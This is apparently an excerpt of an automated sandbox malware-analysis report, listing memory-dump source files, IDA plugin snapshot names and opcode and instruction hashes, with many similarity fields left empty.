                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b07d8e016a891eb32266587f670d9868bd419482e0b1156b6b5873a00c39569a
                                                      • Instruction ID: d4942a6abc0817e8cecdc6c0a10c95511b192bea1d1c342baa2625728f4838f3
                                                      • Opcode Fuzzy Hash: b07d8e016a891eb32266587f670d9868bd419482e0b1156b6b5873a00c39569a
                                                      • Instruction Fuzzy Hash: B63157F7F5162107F3544879DCA8352258397E5329F2F82388F5C6BBC6D87E5C0A4284
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                      • Instruction ID: 26d69a34ad0d1ac30e2d50b9285588da957a16ba879aa9d3dae5977064aab624
                                                      • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                      • Instruction Fuzzy Hash: BBF065205087E28ADB234B3E44606B2AFE09B67120B181FD5C8E19B6C7C3559496C366
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • Opcode ID: 414333ebf0ea7762ccaf1dc5f431df845d4f4b5fb0ace5b36bce28102ed7c816
                                                      • Instruction ID: fa1dead70c1887b2eae729d1a315eb061fe2c0cb4b26a2b7f78c1fb3b9839560
                                                      • Opcode Fuzzy Hash: 414333ebf0ea7762ccaf1dc5f431df845d4f4b5fb0ace5b36bce28102ed7c816
                                                      • Instruction Fuzzy Hash: DB0128706442829BD314CF38CCE0667FBA1FB96364F08CB9DC4568BB96C634D882C795